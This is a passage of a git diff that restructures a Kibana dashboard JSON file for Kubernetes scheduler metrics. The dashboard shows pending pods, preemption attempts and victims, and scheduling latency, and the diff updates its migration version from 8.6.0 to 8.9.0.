"783789d4-8473-40f5-acf0-7ae5c850cd3e:8769bfd6-a9c7-4bab-b048-0e2fcffe8114", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:d79e5279-bd92-48b0-bd92-767cf6b8892d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2525515f-80e7-455f-b88b-53e4abf31cd2:indexpattern-datasource-layer-a69d8e15-2ebf-401c-af12-4b6762f230db", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2525515f-80e7-455f-b88b-53e4abf31cd2:086a73a8-ac9d-48eb-b5b7-3c697278cc9e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_748291db-2826-4242-9107-9a5226733a06:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_2da8af79-7928-4741-8d03-866642f3c2a0:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "a59fd3c5-5f33-425d-b14e-4713222cc729:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "a59fd3c5-5f33-425d-b14e-4713222cc729:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "metrics-*" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249.json b/packages/kubernetes/kibana/dashboard/kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249.json index 8c92202ee74..35a1626c9fa 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249.json @@ -1,3666 +1,3693 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1NiwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Kubernetes Scheduler metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.scheduler" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.scheduler" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": true, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 12, + "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "w": 13, + "x": 0, + "y": 0 }, - "description": "Kubernetes Scheduler metrics", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ + "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Scheduler\n\nThis dashboard collects metrics from [kube scheduler](https://kubernetes.io/docs/concepts/overview/components/#kube-scheduler) endpoint. Its purpose is to give an overview of what is happening inside it through this component metrics and detect problems that might be happening. \n\n**WARNING**: This dataset **requires access** to the Kubernetes scheduler endpoint. Refer [here](https://docs.elastic.co/en/integrations/kubernetes#scheduler-and-controllermanager) to learn how to enable it. In some \"As a Service\" Kubernetes implementations, like GKE or AKS, it is **not possible** to access its metrics.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "w": 35, + "x": 13, + "y": 0 + }, + "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(203,228,249,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Scheduling", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ { - "$state": { - "store": "appState" + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "a47d16df-1a5a-49e1-9a33-dba87c371904", + "w": 16, + "x": 13, + "y": 3 + }, + "panelIndex": "a47d16df-1a5a-49e1-9a33-dba87c371904", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**NOTE**: This section is meant for **one** cluster. Please, filter above. Otherwise, results might be inaccurate.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "a2b844d8-11e3-4469-af4b-744d33b603ad", + "w": 19, + "x": 29, + "y": 3 + }, + "panelIndex": "a2b844d8-11e3-4469-af4b-744d33b603ad", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0c578d26-c937-4b73-a3a6-e15ebd5854e6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0c578d26-c937-4b73-a3a6-e15ebd5854e6": { + "columnOrder": [ + "51d8044e-b2ce-4afa-bca8-4898ee203019", + "680c2d97-35c9-4804-9c57-06645378bef4", + "3309a725-61ed-41e9-99cf-c37888da689b" + ], + "columns": { + "3309a725-61ed-41e9-99cf-c37888da689b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.pending.pods.count: *" + }, + "isBucketed": false, + "label": "Total", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.pending.pods.count" }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.scheduler" + "51d8044e-b2ce-4afa-bca8-4898ee203019": { + "customLabel": false, + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of kubernetes.scheduler.queue", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "3309a725-61ed-41e9-99cf-c37888da689b", + "type": "column" }, - "type": "phrase" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.queue" }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.scheduler" - } + "680c2d97-35c9-4804-9c57-06645378bef4": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Scheduler node", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "3309a725-61ed-41e9-99cf-c37888da689b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "host.name" } + }, + "incompleteColumns": {} } - ], - "query": { - "language": "kuery", - "query": "" + } } - } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "3309a725-61ed-41e9-99cf-c37888da689b" + }, + { + "alignment": "center", + "columnId": "680c2d97-35c9-4804-9c57-06645378bef4", + "isTransposed": false + }, + { + "columnId": "51d8044e-b2ce-4afa-bca8-4898ee203019", + "isTransposed": true + } + ], + "headerRowHeight": "auto", + "layerId": "0c578d26-c937-4b73-a3a6-e15ebd5854e6", + "layerType": "data", + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": true, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "title": "Pending pods" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "125ec894-444e-486b-a9c8-7205cde12a7e", + "w": 8, + "x": 13, + "y": 6 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "125ec894-444e-486b-a9c8-7205cde12a7e", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8cad09ad-7860-45ac-aaad-7b94af09c33d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8cad09ad-7860-45ac-aaad-7b94af09c33d": { + "columnOrder": [ + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51", + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0" + ], + "columns": { + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Preemption attempts", + "operationType": "formula", + "params": { + "formula": "last_value(kubernetes.scheduler.scheduling.preemption.attempts.count)", + "isFormulaBroken": false + }, + "references": [ + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0" + ], + "scale": "ratio" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "### Scheduler\n\nThis dashboard collects metrics from [kube scheduler](https://kubernetes.io/docs/concepts/overview/components/#kube-scheduler) endpoint. Its purpose is to give an overview of what is happening inside it through this component metrics and detect problems that might be happening. \n\n**WARNING**: This dataset **requires access** to the Kubernetes scheduler endpoint. Refer [here](https://docs.elastic.co/en/integrations/kubernetes#scheduler-and-controllermanager) to learn how to enable it. In some \"As a Service\" Kubernetes implementations, like GKE or AKS, it is **not possible** to access its metrics.", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.preemption.attempts.count: *" + }, + "isBucketed": false, + "label": "Part of Preemption attempts", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.preemption.attempts.count" + } + }, + "incompleteColumns": {}, + "sampling": 1 } + } }, - "gridData": { - "h": 12, - "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "w": 13, - "x": 0, - "y": 0 - }, - "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "type": "visualization", - "version": "8.6.0" + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "8cad09ad-7860-45ac-aaad-7b94af09c33d", + "layerType": "data", + "metricAccessor": "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(203,228,249,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Scheduling", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "e6506b77-2e3b-4bfa-831a-8a5daada553b", + "w": 8, + "x": 21, + "y": 6 + }, + "panelIndex": "e6506b77-2e3b-4bfa-831a-8a5daada553b", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-af585c84-2ebf-42a3-9073-4d76e8b2610d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "af585c84-2ebf-42a3-9073-4d76e8b2610d": { + "columnOrder": [ + "19819472-270b-4678-8367-9d09f29ae509", + "19819472-270b-4678-8367-9d09f29ae509X0" + ], + "columns": { + "19819472-270b-4678-8367-9d09f29ae509": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Preemption victims", + "operationType": "formula", + "params": { + "formula": "last_value(kubernetes.scheduler.scheduling.preemption.victims.count)", + "isFormulaBroken": false + }, + "references": [ + "19819472-270b-4678-8367-9d09f29ae509X0" + ], + "scale": "ratio" }, - "title": "", - "type": "metrics", - "uiState": {} + "19819472-270b-4678-8367-9d09f29ae509X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.preemption.victims.count: *" + }, + "isBucketed": false, + "label": "Part of Preemption victims", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.preemption.victims.count" + } + }, + "incompleteColumns": {}, + "sampling": 1 } + } }, - "gridData": { - "h": 3, - "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "w": 35, - "x": 13, - "y": 0 - }, - "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "title": "", - "type": "visualization", - "version": "8.6.0" + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "af585c84-2ebf-42a3-9073-4d76e8b2610d", + "layerType": "data", + "metricAccessor": "19819472-270b-4678-8367-9d09f29ae509" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "**NOTE**: This section is meant for **one** cluster. Please, filter above. Otherwise, results might be inaccurate.", - "openLinksInNewTab": false + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "181a3fe5-e5b5-472e-98af-ea4aaadc3109", + "w": 24, + "x": 0, + "y": 12 + }, + "panelIndex": "181a3fe5-e5b5-472e-98af-ea4aaadc3109", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c038d00b-5e03-420e-9c45-a8aea3c41f99", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c0fe3677-6a5b-4340-8ad0-d8e31b042fe8": { + "columnOrder": [ + "51038211-b99f-4527-b1f1-cab52e7a4902", + "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1" + ], + "columns": { + "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 3, - "i": "a47d16df-1a5a-49e1-9a33-dba87c371904", - "w": 16, - "x": 13, - "y": 3 - }, - "panelIndex": "a47d16df-1a5a-49e1-9a33-dba87c371904", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0c578d26-c937-4b73-a3a6-e15ebd5854e6", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0c578d26-c937-4b73-a3a6-e15ebd5854e6": { - "columnOrder": [ - "51d8044e-b2ce-4afa-bca8-4898ee203019", - "680c2d97-35c9-4804-9c57-06645378bef4", - "3309a725-61ed-41e9-99cf-c37888da689b" - ], - "columns": { - "3309a725-61ed-41e9-99cf-c37888da689b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.pending.pods.count: *" - }, - "isBucketed": false, - "label": "Total", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.pending.pods.count" - }, - "51d8044e-b2ce-4afa-bca8-4898ee203019": { - "customLabel": false, - "dataType": "string", - "isBucketed": true, - "label": "Top 3 values of kubernetes.scheduler.queue", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "3309a725-61ed-41e9-99cf-c37888da689b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.queue" - }, - "680c2d97-35c9-4804-9c57-06645378bef4": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Scheduler node", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "3309a725-61ed-41e9-99cf-c37888da689b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } + "51038211-b99f-4527-b1f1-cab52e7a4902": { + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "3309a725-61ed-41e9-99cf-c37888da689b" - }, - { - "alignment": "center", - "columnId": "680c2d97-35c9-4804-9c57-06645378bef4", - "isTransposed": false - }, - { - "columnId": "51d8044e-b2ce-4afa-bca8-4898ee203019", - "isTransposed": true - } - ], - "headerRowHeight": "auto", - "layerId": "0c578d26-c937-4b73-a3a6-e15ebd5854e6", - "layerType": "data", - "rowHeight": "auto" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "a2b844d8-11e3-4469-af4b-744d33b603ad", - "w": 19, - "x": 29, - "y": 3 - }, - "panelIndex": "a2b844d8-11e3-4469-af4b-744d33b603ad", - "title": "Pending pods", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8cad09ad-7860-45ac-aaad-7b94af09c33d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8cad09ad-7860-45ac-aaad-7b94af09c33d": { - "columnOrder": [ - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51", - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0" - ], - "columns": { - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Preemption attempts", - "operationType": "formula", - "params": { - "formula": "last_value(kubernetes.scheduler.scheduling.preemption.attempts.count)", - "isFormulaBroken": false - }, - "references": [ - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0" - ], - "scale": "ratio" - }, - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.preemption.attempts.count: *" - }, - "isBucketed": false, - "label": "Part of Preemption attempts", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.preemption.attempts.count" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "d23c570b-1f9a-4ea6-be40-b6860fff0d75": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "ms" + } }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layerId": "8cad09ad-7860-45ac-aaad-7b94af09c33d", - "layerType": "data", - "metricAccessor": "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51" - } + "formula": "last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum)/pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)/1000", + "isFormulaBroken": false + }, + "references": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "125ec894-444e-486b-a9c8-7205cde12a7e", - "w": 8, - "x": 13, - "y": 6 - }, - "panelIndex": "125ec894-444e-486b-a9c8-7205cde12a7e", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-af585c84-2ebf-42a3-9073-4d76e8b2610d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "af585c84-2ebf-42a3-9073-4d76e8b2610d": { - "columnOrder": [ - "19819472-270b-4678-8367-9d09f29ae509", - "19819472-270b-4678-8367-9d09f29ae509X0" - ], - "columns": { - "19819472-270b-4678-8367-9d09f29ae509": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Preemption victims", - "operationType": "formula", - "params": { - "formula": "last_value(kubernetes.scheduler.scheduling.preemption.victims.count)", - "isFormulaBroken": false - }, - "references": [ - "19819472-270b-4678-8367-9d09f29ae509X0" - ], - "scale": "ratio" - }, - "19819472-270b-4678-8367-9d09f29ae509X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.preemption.victims.count: *" - }, - "isBucketed": false, - "label": "Part of Preemption victims", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.preemption.victims.count" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.attempts.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Average latency", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.sum" + }, + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.attempts.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Average latency", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.count" + }, + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Average latency", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", + { + "args": [ + 